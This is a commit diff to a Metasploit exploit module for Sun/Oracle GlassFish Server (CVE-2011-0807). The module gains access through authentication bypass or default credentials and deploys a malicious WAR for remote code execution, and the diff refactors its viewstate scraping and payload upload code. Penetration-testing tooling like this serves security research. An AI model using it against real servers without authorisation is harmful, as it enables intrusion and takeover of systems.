This works for Glassfish 4.0 & 9.1

wchen-r7 · wchen-r7 · commit 5c98da05fbb2 · 2015-06-25T01:58:24.000-05:00
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'nokogiri'
 require 'metasploit/framework/login_scanner/glassfish'
 require 'metasploit/framework/credential_collection'
 
@@ -17,33 +18,30 @@ def initialize(info={})
     super(update_info(info,
       'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
       'Description'    => %q{
-          This module logs in to an GlassFish Server 3.1 (Open Source or Commercial)
-        instance using a default credential, uploads, and executes commands via deploying
-        a malicious WAR.  On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x
-        this module will try to bypass authentication instead by sending lowercase HTTP verbs.
+          This module logs in to an GlassFish Server (Open Source or Commercial) using various
+        methods (such as authentication bypass, default credentials, or user-supplied login),
+        and deploys a malicious war file in order to get remote code execution. It has been
+        tested on Glassfish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          # Msf module for Glassfish 3.0
-          'juan vazquez',
-          # Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
-          'Joshua Abraham <jabra[at]rapid7.com>',
-          # Rewrite for 3.0, 3.1 (Commercial or Open Source)
-          'sinn3r',
+          'juan vazquez', # Msf module for Glassfish 3.0
+          'Joshua Abraham <jabra[at]rapid7.com>', # Glassfish 3.1, 2.x & Sun Java System Application Server 9.1
+          'sinn3r' # Rewrite for everything
         ],
       'References'     =>
         [
           ['CVE', '2011-0807'],
-          ['OSVDB', '71948'],
+          ['OSVDB', '71948']
         ],
-      'Platform'       => 'win',
+      'Platform'       => ['win', 'linux', 'java'],
       'Targets'        =>
         [
           [ 'Automatic', { } ],
           [ 'Java Universal',    { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ],
           [ 'Windows Universal', { 'Arch' => ARCH_X86,  'Platform' => 'win' } ],
-          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ],
+          [ 'Linux Universal',   { 'Arch' => ARCH_X86,  'Platform' => 'linux' } ]
         ],
       'DisclosureDate' => "Aug 4 2011",
       'DefaultTarget'  => 0))
@@ -211,9 +209,7 @@ def get_delete_info(session, version, app='')
         return nil
       end
 
-      input_id = "javax.faces.ViewState"
-      p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(.*)" autocomplete="off"/
-      viewstate = res.body.scan(p)[0][0]
+      viewstate = get_viewstate(res.body)
 
       entry = nil
       p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
@@ -287,8 +283,8 @@ def get_version(res)
     p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
     edition = 'Open Source' if banner =~ p
 
-    #Set version.  Some GlassFish servers return banner "GlassFish v3".
-    if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
+    # Set version.  Some GlassFish servers return banner "GlassFish v3".
+    if banner =~ /(GlassFish Server|Open Source Edition) {1,}(\d\.\d)/
       version = $2
     elsif banner =~ /GlassFish v(\d)/ && version == 'Unknown'
       version = $1
@@ -487,6 +483,22 @@ def get_upload_data(opts = {})
     return data
   end
 
+  def get_viewstate(body)
+    @vewstate ||= lambda {
+      noko = Nokogiri::HTML(body)
+      inputs = noko.search('input')
+      hidden_inputs = []
+      inputs.each {|e| hidden_inputs << e if e.attributes['type'].text == 'hidden'}
+      hidden_inputs.each do |e|
+        if e.attributes['name'].text == 'javax.faces.ViewState'
+          return e.attributes['value'].text
+        end
+      end
+
+      ''
+    }.call
+  end
+
   #
   # Upload our payload, and execute it.  This function will also try to automatically
   # clean up after itself.
@@ -503,40 +515,27 @@ def upload_exec(opts = {})
       path = "/applications/upload.jsf?appType=webApp"
       res = send_glassfish_request(path, @verbs['GET'], session)
 
-      #Obtain some properties
-      begin
-        p1 = /id="javax\.faces\.ViewState" value="(j_id\d{1,5}:j_id\d{1,5})"/mi
-        p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
-        viewstate       = res.body.scan(p1)[0][0]
-        status_checkbox = res.body.scan(p2)[0][0]
-        boundary        = rand_text_alphanumeric(28)
-      rescue
-        print_error("Unable to gather required data for file upload")
-        return
-      end
+      # Obtain some properties
+      p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
+      viewstate       = get_viewstate(res.body)
+      status_checkbox = res.body.scan(p2)[0][0]
+      boundary        = rand_text_alphanumeric(28)
     else
       path = "/common/applications/uploadFrame.jsf"
       res = send_glassfish_request(path, @verbs['GET'], session)
 
-      #Obtain some properties
-      begin
-        #start is only for dynamic arguments in POST data
-        res.body =~ /propertySheetSection(\d{3})/
-        start = $1
-        p1 = /"javax\.faces\.ViewState" value="(-?\d+:-?\d+)"/mi
-        p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
-        p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
-
-        rnd_text = rand_text_alphanumeric(29)
-
-        viewstate       = res.body.scan(p1)[0][0]
-        typefield       = res.body.scan(p2)[0][0]
-        status_checkbox = res.body.scan(p3)[0][0]
-        boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
-      rescue
-        print_error("Unable to gather required data for file upload")
-        return
-      end
+      # Obtain some properties
+      res.body =~ /propertySheetSection(\d{3})/
+      start = $1
+      p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
+      p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/
+
+      rnd_text = rand_text_alphanumeric(29)
+
+      viewstate       = get_viewstate(res.body)
+      typefield       = res.body.scan(p2)[0][0]
+      status_checkbox = res.body.scan(p3)[0][0]
+      boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
     end
 
     # Get upload data
@@ -604,7 +603,7 @@ def upload_exec(opts = {})
     # Sleep for a bit before cleanup
     select(nil, nil, nil, 5)
 
-    #Start undeploying
+    # Start undeploying
     print_status("Getting information to undeploy...")
     viewstate, entry = get_delete_info(session, version, app_base)
     if !viewstate
@@ -746,7 +745,7 @@ def exploit
     sid = attempt_login(version)
 
     unless sid
-      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
+      fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate")
     end
 
     selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
